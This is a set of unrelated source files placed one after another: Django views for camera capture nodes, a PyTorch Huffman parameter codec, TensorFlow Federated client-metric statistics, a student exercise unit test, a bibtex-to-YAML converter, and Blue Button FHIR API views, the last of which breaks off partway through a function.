            # Add database id to each camera
            for cam in node['camera_details']:
                cam['ip_address'] = node['ip_address']
                cam['machine_name'] = node['machine_name']
                if cam['unique_id'] in cam_id_map:
                    cam['id'] = cam_id_map[cam['unique_id']]['id']
                    cam['rotation'] = cam_id_map[cam['unique_id']]['rotation']
    return JSONResponse(result)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def camera_detailed(request, location_id="0", camera_id="0"):
    """Return details of one camera, including a large base64 JPEG preview.

    The preview is fetched live from the capture node; on a node error the
    response simply omits 'jpeg_full' (the error is logged). Requires read
    access to the camera's location (403 otherwise); 404 for an unknown
    camera/location pair.
    """
    # Get details of one camera, including large thumbnail
    location_id = int(location_id)
    camera_id = int(camera_id)
    # Check permission for this location_id
    read_access = True
    write_access = False
    if location_id:
        read_access = CaptureLocation.objects.get(pk=location_id).read_access_all or request.user.access_rights.filter(id=location_id, locationaccess__read_access=True).count()>0
        if not read_access:
            return HttpResponse(status=403)
        # NOTE(review): write_access is computed but never used below.
        write_access = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
    # filter camera by location and id
    cameras = Camera.objects.filter(node__location=location_id, id=camera_id)
    if cameras:
        camera = cameras[0]
        serializer = CameraSerializer(camera, many=False, context={'request':request})
        data = serializer.data
        result = {}
        result['camera'] = data
        # Fetch image data directly from capture node
        try:
            jpeg_data = urllib2.urlopen('http://%s:8080/camera/%s/large_preview' % (camera.node.ip_address, camera.unique_id), timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
            result['jpeg_full'] = b64encode(jpeg_data)
        except Exception as e:
            g_logger.error('large_preview %s: %s' % (camera.node.machine_name, e))
        return JSONResponse(result)
    else:
        return HttpResponse(status=404)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def node_discover(request):
    """Register or refresh a capture node announcing itself.

    Creates or updates the node record (keyed by machine_name), syncs its
    camera list with the reported one, and returns the location-wide capture
    settings the node should apply. Rejects clients older than code_version
    1024 (HTTP 426) and nodes not assigned to a location (HTTP 403).
    """
    g_logger.debug('Node Discover %s' % request.data['machine_name'])
    # Look for existing machine in the database, with the same name
    nodes = CaptureNode.objects.filter(machine_name=request.data['machine_name'])
    if nodes:
        # Node exists in database, update it
        node = nodes[0]
        node.ip_address = request.data['ip_address']
        node.last_seen = timezone.now()
    else:
        # Node does not exist, create it
        node = CaptureNode(ip_address=request.data['ip_address'], machine_name=request.data['machine_name'])
    if 'sync_found' in request.data:
        node.sync_found = request.data['sync_found']
    if 'os' in request.data:
        node.os = request.data['os']
    node.online = True
    node.code_version = request.data['code_version'] if 'code_version' in request.data else 0
    if node.code_version < 1024:
        # 426 Upgrade Required: the node's client executable is too old.
        return JSONResponse({'Result':'avacapture.exe Version Too Old'}, status=426)
    # Update drive info
    if 'drives' in request.data:
        node.drive_info = json.dumps(request.data['drives'])
    node.save()
    # Update list of cameras
    if 'cameras' in request.data:
        # TODO We should be getting each cameras Model and Version here, to update the DB
        # request.data may be a plain dict or a QueryDict-like object that
        # needs getlist() to recover multiple values.
        if type(request.data) is dict:
            cam_list = request.data['cameras']
        else:
            cam_list = request.data.getlist('cameras')
        for unique_id in cam_list:
            # if camera does not exist, create it
            obj = Camera.objects.filter(unique_id=unique_id, node=node)
            if not obj:
                obj = Camera(node=node, unique_id=unique_id)
                obj.save()
        # delete any cameras that are not in the list
        for item in Camera.objects.filter(node=node).exclude(unique_id__in=cam_list):
            item.delete()
    if node.location:
        result = {'Result':'OK',
                  'sync_freq':node.location.hardware_sync_frequency,
                  'pulse_duration':node.location.pulse_duration,
                  'external_sync':node.location.external_sync,
                  'display_focus_peak' : node.location.display_focus_peak,
                  'display_overexposed' : node.location.display_overexposed,
                  'display_histogram' : node.location.display_histogram,
                  'bitdepth_avi' : node.location.bitdepth_avi,
                  'bitdepth_single' : node.location.bitdepth_single
                  }
    else:
        return HttpResponse("Node not registered", status=403)
    if 'request_camera_params' in request.data:
        # client is requesting the current parameters of the cameras
        cameras = Camera.objects.filter(node=node)
        # TODO Generalize DB for parameters
        result['camera_params'] = [dict(unique_id=cam.unique_id,
                                        lens_aperture_value=cam.lens_aperture,
                                        exposure=cam.exposure,
                                        gain=cam.gain,
                                        using_sync=cam.using_sync) for cam in cameras]
    # TODO Camera roi
    # return JSON data for the current machine
    return JSONResponse(result)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def node_shutdown(request):
    """Mark every capture node at the reported IP address as offline."""
    ip_address = request.data['ip_address']
    g_logger.debug('Node Shutdown %s' % ip_address)
    # Flag matching nodes offline one at a time (per-instance save so any
    # model save() logic still runs).
    for capture_node in CaptureNode.objects.filter(ip_address=ip_address):
        capture_node.online = False
        capture_node.save()
    return JSONResponse({'Result':'OK'})
|
import re
import torch
from .encode import EncodedParam, EncodedModule
from ..utils import AverageMeter
class Codec(object):
    """Encodes/decodes network parameters according to a per-parameter rule
    table, accumulating compression statistics across all encoded params."""

    def __init__(self, rule):
        """
        Codec for coding
        :param rule: str, path to the rule file, each line formats
            'param_name coding_method bit_length_fixed_point bit_length_fixed_point_of_integer_part
             bit_length_of_zero_run_length'
            list of tuple,
            [(param_name(str), coding_method(str), bit_length_fixed_point(int),
              bit_length_fixed_point_of_integer_part(int), bit_length_of_zero_run_length(int))]
        """
        if isinstance(rule, str):
            # Parse the rule file: keep only well-formed 5-field lines and
            # convert the numeric fields to int.
            # NOTE(review): the file handle from open() is never closed.
            content = map(lambda x: x.split(), open(rule).readlines())
            content = filter(lambda x: len(x) == 5, content)
            rule = list(map(lambda x: (x[0], x[1], int(x[2]), int(x[3]), int(x[4])), content))
        assert isinstance(rule, list) or isinstance(rule, tuple)
        self.rule = rule
        # Aggregated encoding statistics, refreshed by reset_stats():
        # - compression_ratio['compressed'] covers only encoded params,
        #   ['total'] covers all params (encoded or skipped) — see encode().
        # - detail maps param_name -> that param's stats dict.
        # NOTE(review): memory_size['total'] is allocated but never
        # accumulated in encode() — confirm whether it is used elsewhere.
        self.stats = {
            'compression_ratio': {
                'compressed': AverageMeter(),
                'total': AverageMeter()
            },
            'memory_size': {
                'codebook': AverageMeter(),
                'param': AverageMeter(),
                'compressed_param': AverageMeter(),
                'index': AverageMeter(),
                'total': AverageMeter()
            },
            'detail': dict()
        }
        print("=" * 89)
        print("Initializing Huffman Codec\n"
              "Rules\n"
              "{rule}".format(rule=self.rule))
        print("=" * 89)

    def reset_stats(self):
        """
        reset stats of codec
        :return:
            void
        """
        self.stats['detail'] = dict()
        for _, v in self.stats['compression_ratio'].items():
            v.reset()
        for _, v in self.stats['memory_size'].items():
            v.reset()

    def encode_param(self, param, param_name):
        """
        encode the parameters based on rule
        :param param: torch.(cuda.)tensor, parameter
        :param param_name: str, name of parameter
        :return:
            EncodedParam, encoded parameter, or None if no rule matches
        """
        # Find the first rule whose pattern matches the ENTIRE param name
        # (re.match anchors at the start; the span check anchors the end).
        rule_id = -1
        for idx, x in enumerate(self.rule):
            m = re.match(x[0], param_name)
            if m is not None and len(param_name) == m.span()[1]:
                rule_id = idx
                break
        if rule_id > -1:
            rule = self.rule[rule_id]
            encoded_param = EncodedParam(param, method=rule[1],
                                         bit_length=rule[2], bit_length_integer=rule[3],
                                         encode_indices=True, bit_length_zero_run_length=rule[4])
            return encoded_param
        else:
            return None

    def encode(self, model):
        """
        encode network based on rule
        :param model: torch.(cuda.)module, network model
        :return:
            EncodedModule, encoded model
        """
        assert isinstance(model, torch.nn.Module)
        self.reset_stats()
        encoded_params = dict()
        print("=" * 89)
        print("Start Encoding")
        print("=" * 89)
        print("{:^30} | {:<25} | {:<25} | {:<25} | {:<25} | {:<25} | {:<25} | {:<25}".
              format('Param Name', 'Param Density', 'Param Bit', 'Index Bit', 'Param Mem',
                     'Index Mem', 'Codebook Mem', 'Compression Ratio'))
        for param_name, param in model.named_parameters():
            if 'AuxLogits' in param_name:
                # deal with googlenet
                continue
            encoded_param = self.encode_param(param=param.data, param_name=param_name)
            if encoded_param is not None:
                # check encoded result: decoding must reproduce the data exactly
                assert torch.equal(param.data, encoded_param.data)
                stats = encoded_param.stats
                print("{param_name:^30} | {density:<25} | {bit_param:<25} | {bit_index:<25} | "
                      "{mem_param:<25} | {mem_index:<25} | {mem_codebook:<25} | {compression_ratio:<25}"
                      .format(param_name=param_name, density=stats['num_nz'] / stats['num_el'],
                              bit_param=stats['bit_length']['param'], bit_index=stats['bit_length']['index'],
                              mem_param=stats['memory_size']['param'], mem_index=stats['memory_size']['index'],
                              mem_codebook=stats['memory_size']['codebook'],
                              compression_ratio=stats['compression_ratio']))
                encoded_params[param_name] = encoded_param
                # statistics (uncompressed size assumes 32 bits per element)
                self.stats['compression_ratio']['compressed'].accumulate(stats['num_el'] * 32,
                                                                         stats['memory_size']['total'])
                self.stats['compression_ratio']['total'].accumulate(stats['num_el'] * 32,
                                                                    stats['memory_size']['total'])
                self.stats['memory_size']['codebook'].accumulate(stats['memory_size']['codebook'])
                self.stats['memory_size']['param'].accumulate(stats['memory_size']['param'])
                self.stats['memory_size']['index'].accumulate(stats['memory_size']['index'])
                self.stats['memory_size']['compressed_param'].accumulate(stats['memory_size']['param'])
                self.stats['detail'][param_name] = stats
            else:
                # No rule matched: keep the param uncompressed; it still
                # counts toward the overall (total) compression ratio.
                print("{:^30} | skipping".format(param_name))
                memory_size_param = param.data.numel() * 32
                self.stats['compression_ratio']['total'].accumulate(memory_size_param, memory_size_param)
                self.stats['memory_size']['param'].accumulate(memory_size_param)
        print("=" * 89)
        print("Stop Encoding")
        print("=" * 89)
        # Sizes are tracked in bits; divide by 8 and 1024 to report KB.
        print("Compress Ratio | {}\n"
              "Overall Compress Ratio | {}\n"
              "Codebook Memory Size | {:.3f} KB\n"
              "Compressed Param Memory Size | {:.3f} KB\n"
              "Index Memory Size | {:.3f} KB\n"
              "Overall Param Memory Size | {:.3f} KB"
              .format(self.stats['compression_ratio']['compressed'].avg,
                      self.stats['compression_ratio']['total'].avg,
                      self.stats['memory_size']['codebook'].sum / 8 / 1024,
                      self.stats['memory_size']['compressed_param'].sum / 8 / 1024,
                      self.stats['memory_size']['index'].sum / 8 / 1024,
                      self.stats['memory_size']['param'].sum / 8 / 1024))
        print("=" * 89)
        return EncodedModule(module=model, encoded_param=encoded_params)

    @staticmethod
    def decode(model, state_dict):
        """
        decode the network using state dict from EncodedModule
        :param model: torch.nn.module, network model
        :param state_dict: state dict from EncodedModule
        :return:
            torch.nn.module, decoded network
        """
        assert isinstance(model, torch.nn.Module)
        print("=" * 89)
        print("Start Decoding")
        for param_name, param in model.named_parameters():
            if 'AuxLogits' in param_name:
                # deal with googlenet: keep the model's own values
                state_dict[param_name] = param.data
            elif param_name in state_dict and isinstance(state_dict[param_name], dict):
                # A dict entry is an encoded param's state dict; decode it
                # back to a tensor in place.
                print("Decoding {}".format(param_name))
                encoded_param = EncodedParam()
                encoded_param.load_state_dict(state_dict[param_name])
                state_dict[param_name] = encoded_param.data
        model.load_state_dict(state_dict)
        print("Stop Decoding")
        print("=" * 89)
        return model
|
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Libraries for computing distributions of metrics across clients."""
import collections
import functools
import itertools
from typing import Callable, Mapping, Sequence
import tensorflow as tf
import tensorflow_federated as tff
import tensorflow_probability as tfp
# Rank-1 float32 specs: one metric value and one weight per client.
INPUT_TENSOR_SPEC = tf.TensorSpec(shape=([None]), dtype=tf.float32)
WEIGHTS_TENSOR_SPEC = tf.TensorSpec(shape=([None]), dtype=tf.float32)
# Signature of a statistic: (per-client metric values, per-client weights) -> stat.
StatFnType = Callable[[tf.Tensor, tf.Tensor], tf.Tensor]
# Number of client datasets evaluated per federated computation invocation.
CLIENTS_PER_CHUNK = 50
@tf.function
def compute_metrics(model: tff.learning.Model,
                    eval_weights: tff.learning.ModelWeights,
                    metrics: Sequence[tf.keras.metrics.Metric],
                    dataset: tf.data.Dataset):
  """Computes metrics for a given model, model weights, and dataset.

  The model must be a `tff.learning.Model` with a single output model
  prediction. In particular, the output of `model.forward_pass(...)` must have
  an attribute `predictions` with shape matching that of the true labels
  in `dataset`.

  Args:
    model: A `tff.learning.Model` used for evaluation.
    eval_weights: A `tff.learning.ModelWeights` that can be assigned to the
      model weights of `model`. These weights are used for evaluation.
    metrics: A sequence of `tf.keras.metrics.Metric` objects.
    dataset: A `tf.data.Dataset` whose batches match the expected structure of
      `model.forward_pass`.

  Returns:
    A `collections.OrderedDict` of metrics values computed for the given model
    at the given model weights over the input dataset. Includes an extra
    'num_examples' entry (cast to float32) usable as a weight downstream.
  """
  model_weights = tff.learning.ModelWeights.from_model(model)
  # Copy the evaluation weights into the model's variables in place.
  tf.nest.map_structure(lambda x, y: x.assign(y), model_weights, eval_weights)
  num_examples = tf.constant(0, dtype=tf.int32)
  for batch in dataset:
    # Normalize namedtuple batches to mappings.
    if hasattr(batch, '_asdict'):
      batch = batch._asdict()
    output = model.forward_pass(batch, training=False)
    y_pred = output.predictions
    # TODO(b/187941327): Avoid having to branch here once we are confident that
    # we are only passing in datasets that yield tuples.
    if isinstance(batch, collections.abc.Mapping):
      y_true = batch.get('y')
    else:
      y_true = batch[1]
    for metric in metrics:
      metric.update_state(y_true, y_pred)
    num_examples += tf.shape(y_true)[0]
  metric_results = collections.OrderedDict()
  for metric in metrics:
    metric_results[metric.name] = tf.cast(metric.result(), dtype=tf.float32)
  # Expose the example count as a float "metric" so stat fns can weight by it.
  metric_results['num_examples'] = tf.cast(num_examples, dtype=tf.float32)
  return metric_results
def create_federated_eval_distribution_computation(
    model_fn: Callable[[], tff.learning.Model],
    metrics_builder: Callable[[], Sequence[tf.keras.metrics.Metric]]
) -> tff.Computation:
  """Builds a TFF computation for computing distributions of client metrics.

  Args:
    model_fn: A no-arg function that returns a `tff.learning.Model`. This method
      must not capture TensorFlow tensors or variables and use them.
    metrics_builder: A no-arg function that returns a sequence of
      `tf.keras.metrics.Metric` objects. These metrics must have a callable
      `update_state` accepting `y_true` and `y_pred` arguments, corresponding to
      the true and predicted label, respectively.

  Returns:
    A `tff.federated_computation` that accepts a `tff.learning.ModelWeights`
    structure placed at `SERVER` matching the model structure of
    `model_fn()`, and a federated dataset. This computation returns
    a sequence of evaluation metrics computed over all clients.
  """
  # Wrap model construction in a graph to avoid polluting the global context
  # with variables created for this model.
  with tf.Graph().as_default():
    placeholder_model = model_fn()
    model_weights_type = tff.learning.framework.weights_type_from_model(
        placeholder_model)
    model_input_type = tff.SequenceType(placeholder_model.input_spec)

  @tff.tf_computation(model_weights_type, model_input_type)
  def compute_client_metrics(model_weights, dataset):
    # Runs on each client: build a fresh model and metrics per invocation.
    model = model_fn()
    metrics = metrics_builder()
    return compute_metrics(model, model_weights, metrics, dataset)

  @tff.federated_computation(
      tff.type_at_server(model_weights_type),
      tff.type_at_clients(model_input_type))
  def fed_eval(model_weights, federated_dataset):
    """Computes client metrics across all clients and collects them."""
    client_model = tff.federated_broadcast(model_weights)
    return tff.federated_map(compute_client_metrics,
                             (client_model, federated_dataset))

  return fed_eval
def create_federated_eval_distribution_fn(
    model_fn: Callable[[], tff.learning.Model],
    metrics_builder: Callable[[], Sequence[tf.keras.metrics.Metric]],
    stat_fns: Mapping[str, StatFnType]):
  """Compute custom statistics across client metrics.

  Args:
    model_fn: A no-arg function that returns a `tff.learning.Model`. This method
      must not capture TensorFlow tensors or variables and use them.
    metrics_builder: A no-arg function that returns a sequence of
      `tf.keras.metrics.Metric` objects. These metrics must have a callable
      `update_state` accepting `y_true` and `y_pred` arguments, corresponding to
      the true and predicted label, respectively.
    stat_fns: A mapping in which each key-value pair represents a custom
      statistic to be evaluated on the client metrics. Each pair consists of a
      string-typed key describing this statistic, and a callable-typed value
      that computes the statistic of metrics. The callable value should accept
      two sequence-typed arguments `all_clients_this_metric` and
      `all_clients_num_examples` and returns the corresponding statistics.

  Returns:
    A callable that accepts a `tff.learning.ModelWeights`
    structure placed at `SERVER` matching the model structure of
    `model_fn()`, and a federated dataset. This computation returns
    an OrderedDict of statistics of metrics computed based on stat_fns,
    keyed '<metric_name>/<stat_name>'.
  """
  fed_eval = create_federated_eval_distribution_computation(
      model_fn, metrics_builder)

  def eval_metric_distribution(model_weights: tff.learning.ModelWeights,
                               federated_dataset):
    # Evaluate clients in chunks of CLIENTS_PER_CHUNK to bound the size of a
    # single fed_eval invocation; iter(callable, []) keeps pulling chunks
    # until an empty chunk signals exhaustion.
    take = lambda n, iterable: list(itertools.islice(iterable, n))
    chunked_federated_dataset = iter(
        functools.partial(take, CLIENTS_PER_CHUNK, iter(federated_dataset)), [])
    map_fn = lambda fds: fed_eval(model_weights, fds)
    chunked_all_clients_all_metrics = map(map_fn, chunked_federated_dataset)
    all_clients_all_metrics = list(
        itertools.chain.from_iterable(chunked_all_clients_all_metrics))
    all_clients_num_examples = [
        one_client_all_metrics['num_examples']
        for one_client_all_metrics in all_clients_all_metrics
    ]
    all_clients_num_examples = tf.convert_to_tensor(
        all_clients_num_examples, dtype=tf.float32)
    metric_names = all_clients_all_metrics[0].keys()
    distribution_metrics = collections.OrderedDict()
    for metric_name in metric_names:
      # num_examples serves as the weight vector, not a metric to summarize.
      if metric_name == 'num_examples':
        continue
      all_clients_this_metric = [
          one_client_all_metrics[metric_name]
          for one_client_all_metrics in all_clients_all_metrics
      ]
      for stat_name, stat_fn in stat_fns.items():
        distribution_metrics[metric_name + f'/{stat_name}'] = stat_fn(
            tf.convert_to_tensor(all_clients_this_metric, dtype=tf.float32),
            all_clients_num_examples).numpy()
    return distribution_metrics

  return eval_metric_distribution
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def unweighted_avg(input_tensor, weights_tensor):
  """Compute the unweighted average of a given tensor (weights ignored)."""
  del weights_tensor
  return tf.reduce_mean(input_tensor)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def weighted_avg(input_tensor, weights_tensor):
  """Compute the weighted average of a given tensor."""
  result_tensor = tf.reduce_sum(
      input_tensor * weights_tensor) / tf.reduce_sum(weights_tensor)
  return result_tensor
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def unweighted_std(input_tensor, weights_tensor):
  """Compute the unweighted population standard deviation of a given tensor.

  (Docstring fixed: it previously said "variance" although the body computes
  tf.math.reduce_std — it had been swapped with unweighted_var's.)
  """
  del weights_tensor
  return tf.math.reduce_std(input_tensor)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def unweighted_var(input_tensor, weights_tensor):
  """Compute the unweighted population variance of a given tensor.

  (Docstring fixed: it previously said "standard deviation" although the body
  computes tf.math.reduce_variance — it had been swapped with
  unweighted_std's.)
  """
  del weights_tensor
  return tf.math.reduce_variance(input_tensor)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def pct95(input_tensor, weights_tensor):
  """Compute the 95th percentile of a given tensor (weights ignored)."""
  del weights_tensor
  return tfp.stats.percentile(input_tensor, 95)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def pct75(input_tensor, weights_tensor):
  """Compute the 75th percentile of a given tensor (weights ignored)."""
  del weights_tensor
  return tfp.stats.percentile(input_tensor, 75)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def median(input_tensor, weights_tensor):
  """Compute the 50th percentile (median) of a given tensor (weights ignored)."""
  del weights_tensor
  return tfp.stats.percentile(input_tensor, 50)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def pct25(input_tensor, weights_tensor):
  """Compute the 25th percentile of a given tensor (weights ignored)."""
  del weights_tensor
  return tfp.stats.percentile(input_tensor, 25)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def pct5(input_tensor, weights_tensor):
  """Compute the 5th percentile of a given tensor (weights ignored)."""
  del weights_tensor
  return tfp.stats.percentile(input_tensor, 5)
# Registry of statistic name -> StatFnType, consumable as the `stat_fns`
# argument of create_federated_eval_distribution_fn.
# NOTE(review): unweighted_std is defined above but not registered here
# ('var' maps to unweighted_var) — confirm whether a 'std' entry was intended.
ALL_STAT_FNS = {
    'avg': unweighted_avg,
    'wavg': weighted_avg,
    'var': unweighted_var,
    'med': median,
    'pct95': pct95,
    'pct75': pct75,
    'pct25': pct25,
    'pct5': pct5
}
|
import unittest
from unittest.mock import patch
from tmc import points
from tmc.utils import load, load_module, reload_module, get_stdout, check_source
from functools import reduce
import os
import textwrap
from random import randint
# Module path and function name of the student solution under test.
exercise = 'src.items_multiplied_by_two'
function = 'double_items'
@points('5.double_items')
class DoubleItemsTest(unittest.TestCase):
    """Exercise tests for double_items(numbers: list).

    Verifies that the function exists, returns a new list with every item
    doubled, and does not mutate the input list.
    """

    @classmethod
    def setUpClass(cls):
        # The student module must not read input() at import time.
        with patch('builtins.input', side_effect=[AssertionError("Asking input from the user was not expected")]):
            cls.module = load_module(exercise, 'en')

    def test_0_main_program_ok(self):
        # Top-level test code must live inside the __main__ guard.
        ok, line = check_source(self.module)
        message = """The code for testing the functions should be placed inside
if __name__ == "__main__":
block. The following row should be moved:
"""
        self.assertTrue(ok, message+line)

    def test_1_function_exists(self):
        try:
            from src.items_multiplied_by_two import double_items
        except:
            self.assertTrue(False, 'Your code should contain function named as double_items(numbers: list)' )
        try:
            from src.items_multiplied_by_two import double_items
            double_items([1])
        except:
            self.assertTrue(False, 'Make sure, that function can be called as follows\ndouble_items([1])' )

    def test_2_type_of_return_value(self):
        double_items = load(exercise, function, 'en')
        val = double_items([1])
        self.assertTrue(type(val) == list, f"Function {function} does not return value of list type when calling double_items([1]).")

    def test_3_lists(self):
        test_cases = ([1,3,5,7], [2,6,4,8,2,6,4], [9,7,5,3,1], [10,100,1000,100,10], [9,9,9,9,9])
        for test_case in test_cases:
            with patch('builtins.input', side_effect=[AssertionError("Asking input from the user was not expected")]):
                reload_module(self.module)
                output_at_start = get_stdout()
                double_items = load(exercise, function, 'en')
                correct = [x*2 for x in test_case]
                # Keep a copy so mutation of the original can be detected.
                test_case2 = test_case[:]
                try:
                    test_result = double_items(test_case)
                except:
                    self.assertTrue(False, f"Make sure, that the function works when the input is\n{test_case2}")
                self.assertEqual(correct, test_result, f"The result\n{test_result} \ndoes not match with the model solution\n{correct} \nwhen the input is\n{test_case2}")
                # Fix: removed doubled word ("should should") in the
                # student-facing failure message below.
                self.assertEqual(test_case, test_case2, f"Function should not change the original list. The value should be {test_case2} but it is {test_case}.")
if __name__ == '__main__':
unittest.main() |
from .conv_expanded_weights import ConvPerSampleGrad
from .embedding_expanded_weights import EmbeddingPerSampleGrad
from .linear_expanded_weights import LinearPerSampleGrad
from .expanded_weights_impl import ExpandedWeight
__all__ = ['ExpandedWeight']
|
import os
import sys
import re
import _bibtex
# Parse the .bib file named on the command line and emit a YAML-ish
# publication list on stdout.
f = _bibtex.open_file(sys.argv[1], True)

# Collect all real bibliography entries, skipping comments/preambles/macros.
entries = []
while True:
    entry = _bibtex.next_unfiltered(f)
    if entry is None:
        break
    if entry[0] != 'entry':
        # skip
        continue
    entries.append(entry)

pubs = ""
for entry in entries:
    name = entry[1][0]
    entry = entry[1][4]
    pubs += '- name: %s\n' % name
    # author (mandatory)
    assert 'author' in entry
    data = _bibtex.expand(f, entry['author'], -1)[2].strip()
    pubs += " authors: \"%s\"\n" % data
    # title (mandatory)
    assert 'title' in entry
    data = _bibtex.expand(f, entry['title'], -1)[2].strip()
    pubs += " title: \"%s\"\n" % data
    # venue: booktitle, else journal (with pages/number/volume), else
    # 'inproceedings'. NOTE(review): 'inproceedings' is normally an entry
    # *type*, not a field, and pages/number/volume are only appended for
    # journals — confirm both are intentional.
    if 'booktitle' in entry:
        data = _bibtex.expand(f, entry['booktitle'], -1)[2].strip()
    elif 'journal' in entry:
        data = _bibtex.expand(f, entry['journal'], -1)[2].strip()
        if 'pages' in entry:
            pages = _bibtex.expand(f, entry['pages'], -1)[2].strip()
            data += ", Pages %s" % pages
        if 'number' in entry:
            number = _bibtex.expand(f, entry['number'], -1)[2].strip()
            data += ", Number %s" % number
        if 'volume' in entry:
            volume = _bibtex.expand(f, entry['volume'], -1)[2].strip()
            data += ", Volume %s" % volume
    elif 'inproceedings' in entry:
        data = _bibtex.expand(f, entry['inproceedings'], -1)[2].strip()
    else:
        assert False
    pubs += " venue: \"%s\"\n" % data
    # Location
    if 'address' in entry:
        data = _bibtex.expand(f, entry['address'], -1)[2].strip()
        pubs += " address: \"%s\"\n" % data
    # date
    assert 'year' in entry
    yr = _bibtex.expand(f, entry['year'], -1)[2].strip()
    if 'month' in entry:
        mo = _bibtex.expand(f, entry['month'], -1)[2].strip()
        mo += ", "
    else:
        mo = ""
    pubs += " date: \"%s%s\"\n" % (mo, yr)
    # File(s) detection: paper PDF, .bib snippet and lecture slides named
    # after the part of the entry key before the first ':'.
    cwd = os.getcwd()
    pdf = name.split(":")[0] + ".pdf"
    bib = name.split(":")[0] + ".bib"
    lec = "lecture_" + name.split(":")[0] + ".pdf"
    if os.path.exists(os.path.join(cwd, pdf)):
        pubs += " pdf: %s\n" % pdf
    if os.path.exists(os.path.join(cwd, bib)):
        pubs += " bib: %s\n" % bib
    if os.path.exists(os.path.join(cwd, lec)):
        pubs += " lec: %s\n" % lec
    pubs += "\n"

# some hacks: strip LaTeX ordinal superscripts.
pubs = pubs.replace("$^st$", "st")
pubs = pubs.replace("$^{st}$", "st")
pubs = pubs.replace("$^nd$", "nd")
pubs = pubs.replace("$^rd$", "rd")
pubs = pubs.replace("$^th$", "th")
pubs = pubs.replace("$^{th}$", "th")
# NOTE(review): this replacement is a no-op as written — presumably the
# target was an escaped form (e.g. "\\&" or "&amp;") lost in transit; confirm.
pubs = pubs.replace("&", "&")
# Bug fix: was the Python-2 statement `print pubs`; the call form works on
# both Python 2 and 3.
print(pubs)
|
from __future__ import absolute_import
from __future__ import unicode_literals
import json
import logging
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from collections import OrderedDict
import requests
from requests_oauthlib import OAuth2
__author__ = "Alan Viars"
def build_fhir_urls(patient_id=None, since_date=None):
    """Build the FHIR endpoint URLs used by the views in this module.

    Always returns 'eob_search' and 'patient_search'; when a patient_id is
    given, also 'coverage', 'eob' and 'patient'. ``since_date`` is currently
    unused but kept for interface stability.
    """
    base = getattr(settings, 'FHIR_BASE_ENDPOINT',
                   "https://sandbox.bluebutton.cms.gov/v1/fhir/")
    urls = {
        'eob_search': urljoin(base, "ExplanationOfBenefit/"),
        'patient_search': urljoin(base, "Patient/"),
    }
    if patient_id:
        urls['coverage'] = urljoin(base, "Coverage/?beneficiary=%s" % (patient_id))
        urls['eob'] = urljoin(base, "ExplanationOfBenefit/?patient=%s" % (patient_id))
        urls['patient'] = urljoin(base, "Patient/%s" % (patient_id))
    return urls
@login_required
def bbof_get_userinfo(request):
    """Fetch the OIDC userinfo document for the logged-in user and render it."""
    context = {'name': 'Get Userinfo'}
    url = getattr(settings, 'USER_INFO_ENDPOINT',
                  "https://sandbox.bluebutton.cms.gov/v1/connect/userinfo")
    # Reuse the OAuth2 access token obtained at login via python-social-auth.
    token = request.user.social_auth.get(provider='oauth2io').access_token
    auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
                  token={'access_token': token, 'token_type': 'Bearer'})
    response = requests.get(url, auth=auth)
    if response.status_code in (200, 404):
        # Parse once instead of calling response.json() twice.
        # NOTE(review): this raises on a non-JSON 404 body — confirm acceptable.
        payload = response.json()
        if payload:
            content = json.dumps(payload, indent=4)
        else:
            content = {'error': 'problem reading content.'}
    else:
        # Covers 403 and all other errors. The original built an error dict
        # for 403 but immediately overwrote it with the raw body; the dead
        # store is removed, behavior unchanged.
        content = response.content
    context['remote_status_code'] = response.status_code
    context['remote_content'] = content
    context['url'] = url
    return render(request, 'bbof.html', context)
@login_required
def bbof_get_patient(request, patient_id=None):
    """Fetch a Patient FHIR resource and render it."""
    context = {'name': 'Blue Button on FHIR'}
    urls = build_fhir_urls(patient_id)
    # first we get the token used to login
    token = request.user.social_auth.get(provider='oauth2io').access_token
    auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
                  token={'access_token': token, 'token_type': 'Bearer'})
    # next we call the remote api
    url = urls['patient']
    logging.debug("calling FHIR Service with %s" % url)
    response = requests.get(url, auth=auth)
    if response.status_code in (200, 404):
        payload = response.json()
        if payload:
            content = json.dumps(payload, indent=4)
        else:
            content = {'error': 'problem reading content.'}
    else:
        # 403 and other errors: show the raw body (the 403 error dict in the
        # original was dead code — it was immediately overwritten).
        content = response.content
    context['remote_status_code'] = response.status_code
    context['remote_content'] = content
    context['url'] = url
    # Bug fix: key was misspelled 'pqtient'; 'patient' matches the sibling
    # view bbof_get_fhir and the template's expectation.
    context['patient'] = patient_id
    return render(request, 'bbof.html', context)
@login_required
def bbof_get_eob(request, patient_id=None):
    """Fetch the ExplanationOfBenefit search for a patient and render it."""
    context = {'name': 'Blue Button on FHIR'}
    # first we get the token used to login
    token = request.user.social_auth.get(provider='oauth2io').access_token
    auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
